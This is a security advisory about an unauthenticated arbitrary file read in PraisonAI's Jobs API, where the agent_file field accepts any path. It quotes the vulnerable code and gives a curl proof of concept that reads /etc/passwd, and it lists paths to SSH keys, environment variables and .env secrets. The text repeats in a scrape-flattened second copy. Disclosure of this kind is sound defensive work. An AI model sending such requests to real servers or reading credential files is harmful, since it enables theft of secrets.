Summary
An unauthenticated attacker can read arbitrary files on the server by supplying an absolute filesystem path in the agent_file field of the Jobs API. The field has no path validation, no allowlist, and no authentication is required to submit jobs.
Details
The agent_file field in JobSubmitRequest accepts any filesystem path with no validation:
# src/praisonai/praisonai/jobs/models.py:29
agent_file: Optional[str] = Field(None, description="Path to agents.yaml file")
# NO path validator, NO allowlist
The executor reads the file directly:
# src/praisonai/praisonai/jobs/executor.py:221
agent_file = job.agent_file or "agents.yaml"
# passed directly to yaml.safe_load(open(agent_file))
Proof of Concept
curl -X POST http://:8005/api/v1/runs \
-H "Content-Type: application/json" \
-d '{"prompt": "run", "agent_file": "/etc/passwd"}'
Server responds with contents of /etc/passwd.
Other exploitable paths:
/proc/1/environ — environment variables, API keys
/home//.ssh/id_rsa — SSH private keys
/app/.env — application secrets
Impact
Any unauthenticated attacker with network access to port 8005 can read any file accessible to the server process, including credentials, private keys, and environment variables.
References
Summary
An unauthenticated attacker can read arbitrary files on the server by supplying an absolute filesystem path in the
agent_filefield of the Jobs API. The field has no path validation, no allowlist, and no authentication is required to submit jobs.Details
The
agent_filefield inJobSubmitRequestaccepts any filesystem path with no validation:The executor reads the file directly:
Proof of Concept
Server responds with contents of
/etc/passwd.Other exploitable paths:
/proc/1/environ— environment variables, API keys/home//.ssh/id_rsa— SSH private keys/app/.env— application secretsImpact
Any unauthenticated attacker with network access to port 8005 can read any file accessible to the server process, including credentials, private keys, and environment variables.
References